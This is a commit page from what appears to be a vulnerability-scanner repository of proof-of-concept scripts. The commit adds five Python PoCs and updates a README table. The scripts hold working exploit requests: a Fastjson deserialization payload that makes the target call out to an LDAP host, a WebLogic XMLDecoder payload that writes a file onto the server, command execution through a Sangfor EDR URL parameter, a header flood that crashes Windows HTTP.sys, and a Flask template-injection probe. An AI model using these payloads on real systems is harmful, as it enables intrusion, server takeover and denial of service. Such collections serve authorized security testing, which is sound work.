openx-org/BLEN
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

2.23.9

Browse Source
This commit is contained in:
openx-org
2022-03-25 18:08:13 +08:00
parent a288ccaee8
commit 53a7640bd8
6 changed files with 418 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
README.md
View File

@@ -3,7 +3,7 @@
[![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/)
[![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/BLEN/blob/main/LICENSE)
[![POC_NUM](https://img.shields.io/badge/poc_num-157-orange.svg)](#PocSupport)
[![POC_NUM](https://img.shields.io/badge/poc_num-162-orange.svg)](#PocSupport)
![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/BLEN?color=gree)
![GitHub forks](https://img.shields.io/github/forks/openx-org/BLEN?color=blue)
@@ -179,6 +179,9 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|Apache Solr|Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)|``poc/Apache_Solr/CVE_2019_17558/poc.py``|
||Apache Solr 任意文件读取漏洞|``poc/Apache_Solr/File_Read/poc.py``|
||Apache Solr 远程命令执行 Log4j|``poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py``|
|Alibaba_FastJson|Alibaba_FastJsonRCE_CVE_2017_18349|``poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py``|
|MicroSoft|MicroSoftRCE_CVE_2022_2190|``poc\MicroSoftRCE_CVE_2022_21907\poc.py``|
|Sangfor 深信服|深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)|``poc/SANGFOR_深信服/RCE_2020_EDR/poc.py``|
|碧海威 L7|碧海威 L7 弱口令漏洞|``poc/Bithighway_碧海威/Weak_Pass_L7/poc.py``|
|BSPHP|BSPHP 未授权访问 信息泄露漏洞|``poc/BSPHP/Info_Disclosure/poc.py``|
|C-Lodop|C-Lodop 云打印机系统平台任意文件读取漏洞|``poc/C_Lodop/File_Read/poc.py``|
@@ -317,6 +320,8 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||RCE_CVE-2018-3191|``poc/Weblogic/RCE_CVE_2018_3191/poc.py``|
||Weblogic SSRF (CVE-2014-4210)|``poc/Weblogic/SSRF_CVE_2014_4210/poc.py``|
||Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883|``poc/Weblogic/UnAuth_RCE_CVE_2020_14882/poc.py``|
||Weblogic XMLDecoder反序列化漏洞CVE-2017-3506|``poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py``|
|Flask_Ssti|Flask_Ssti_CVE-2017-12636|``poc\Flask_Ssti_CVE-2017-12636\poc.py``|
|用友NC|用友NC6.5 BeanShell RCE|``poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/poc.py``|
||用友ERP-NC 目录遍历漏洞|``poc/Yonyou_用友NC/Dir_List_ERP/poc.py``|
||用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923|``poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/poc.py``|

87
poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py Normal file
View File

@@ -0,0 +1,87 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua,get_ceye_dns,verify_ceye_dns
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
组件类的漏洞并不适合直接拿到BLEN里批量扫失败是可以预见的事情笔者建议的是在渗透过程中将可疑的url拿来测试
""", # POC描述写更新描述没有就不写
"name" : "Fastjson 反序列化远程代码执行漏洞CVE-2017-18349", # 漏洞名称
"VulnID" : "CVE-2017-18349", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Fastjson", # 漏洞应用名称
"AppVersion" : "Fastjson <= 1.2.24", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码
""", # 漏洞简要描述
"fofa-dork":"""
app="Fastjson"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "" # url自己按需调整
success,dns_flag = get_ceye_dns()
if success == False:
return [False,dns_flag]
data = '''
{
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://%s/",
"autoCommit": true
}
}
''' % (dns_flag)
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/json",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
flager = verify_ceye_dns(dns_flag)
if flager == True:
vuln = [True,dns_flag]
elif flager == False:
vuln = [False,dns_flag]
else:
vuln = [False,flager]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

59
poc/Flask_Ssti_CVE-2017-12636/poc.py Normal file
View File

@@ -0,0 +1,59 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
# ...
import urllib3
urllib3.disable_warnings()
_info = {
"author" : "", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
该POC不具备使用价值请忽略
""", # POC描述写更新描述没有就不写
"name" : "Flask 模板注入", # 漏洞名称
"AppName" : "Flask", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
"timeout" : 10, # 超时设定
}
def verify(host,proxy):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 and "54289" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
return vuln

109
poc/MicroSoftRCE_CVE_2022_21907/poc.py Normal file
View File

@@ -0,0 +1,109 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
import time
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
"PocDesc" : """
本POC只可实现蓝屏
""", # POC描述写更新描述没有就不写
"name" : "Windows HTTP协议栈远程代码执行漏洞(CVE-2022-21907)", # 漏洞名称
"VulnID" : "CVE-2022-21907", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : """
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
""", # 漏洞应用版本
"VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
Microsoft Windows HTTP 协议栈HTTP.sys存在远程代码执行漏洞未经身份认证的远程攻击者可通过向目标 Web 服务器发送特制的HTTP请求来利用此漏洞
从而在目标系统上执行任意代码。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞,微软建议优先修补受此漏洞影响的服务器。
此漏洞影响启用了HTTP Trailer Support的系统默认情况下Windows Server 2019 和 Windows 10 版本 1809不易受到攻击。
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 :
poc_headers = {
'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, '
'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, '
'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, '
'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, '
'OOOAOAOOOAOOAOOOAOOOAOOOAOO, '
'****************************stupiD, *, ,'
}
try:
req = requests.get(url,headers = poc_headers , proxies = self.proxy ,timeout = 5,verify = False)
except requests.exceptions.ReadTimeout as e:
try:
time.sleep(10)
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
except requests.exceptions.ConnectionError as e:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

72
poc/SANGFOR_深信服RCE_2020_EDR/poc.py Normal file
View File

@@ -0,0 +1,72 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
import re
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : " ", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)", # 漏洞名称
"VulnID" : "CNVD-2020-46552", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
终端检测响应平台EDR是深信服公司提供的一套终端安全解决方案方案由轻量级的端点安全软件Agent和管理平台MGR共同组成。
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/tool/log/c.php?strip_slashes=system&host=id" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
result = re.search("uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)",req.text.strip())
if result:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

85
poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py Normal file
View File

@@ -0,0 +1,85 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua,random_str
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "Weblogic XMLDecoder反序列化漏洞CVE-2017-3506", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : """
Oracle WebLogic Server10.3.6.0.0
Oracle WebLogic Server12.1.3.0.0
Oracle WebLogic Server12.2.1.1.0
Oracle WebLogic Server12.2.1.2.0
""", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
2017年4月17日国家信息安全漏洞共享平台CNVD公开了Weblogic反序列化远程代码执行漏洞CNVD-C-2019-48814
由于在反序列化处理输入信息的过程中存在缺陷,
未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url0 = self.target + "/wls-wsat/CoordinatorPortType" # url自己按需调整
str_flag = random_str()
filename_flag = random_str() + ".log"
data0 = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/' \
'"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java vers' \
'ion="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminSer' \
'ver/tmp/_WL_internal/wls-wsat/54p17w/war/{REWEBSHELL}</string><void method="println"><string>{StrFlag}</string></' \
'void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></' \
'soapenv:Envelope>'.format(REWEBSHELL=filename_flag,StrFlag = str_flag)
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "text/xml",
}
url1 = self.target + "/wls-wsat/" + filename_flag
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req0 = requests.post(url0,data=data0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if str_flag in req1.text:#req.status_code == 200 and :
vuln = [True,req1.text]
else:
vuln = [False,req1.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()